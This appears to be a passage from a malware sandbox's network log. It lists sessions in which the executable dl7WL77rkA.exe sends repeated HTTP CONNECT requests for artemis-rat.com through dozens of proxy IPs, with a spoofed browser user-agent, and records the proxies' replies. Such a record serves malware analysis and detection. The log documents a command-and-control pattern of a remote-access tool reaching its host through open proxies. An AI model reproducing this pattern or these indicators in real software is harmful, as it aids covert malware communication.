                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            547192.168.2.551689162.214.154.176322103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.684359074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139182091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.654889107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702430010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811731100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.905631065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014604092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217742920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514575958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            548192.168.2.551721132.148.128.8885953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.684983969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139179945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.654889107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.702083111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            549192.168.2.551712159.89.138.130803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685066938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.860451937 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            550192.168.2.551542218.6.120.11177773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685244083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.770670891 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            551192.168.2.551488103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685247898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            552192.168.2.55055872.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685322046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            553192.168.2.55162798.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.685684919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            554192.168.2.551548192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694021940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            555192.168.2.551759185.162.230.201803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694266081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.857326984 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            556192.168.2.551547103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694693089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            557192.168.2.550702142.4.7.20107223876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.694935083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806237936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.905225992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014626980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            558192.168.2.551591185.18.198.163587143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.696230888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.326689005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202874899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            559192.168.2.550491103.148.51.1980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.698462963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            560192.168.2.551570196.20.125.14980833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.699160099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            561192.168.2.551606212.110.188.189344053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.699290037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.950504065 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            562192.168.2.55157746.105.35.19380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.700112104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.006129026 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            563192.168.2.55161459.6.26.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.705161095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.016673088 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            564192.168.2.55157854.233.119.17231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.709794998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.033909082 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            565192.168.2.551772104.16.106.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.710649014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.864897013 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            566192.168.2.551774104.17.50.45803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.711100101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.865458012 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            567192.168.2.550700174.138.94.117803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.711786032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
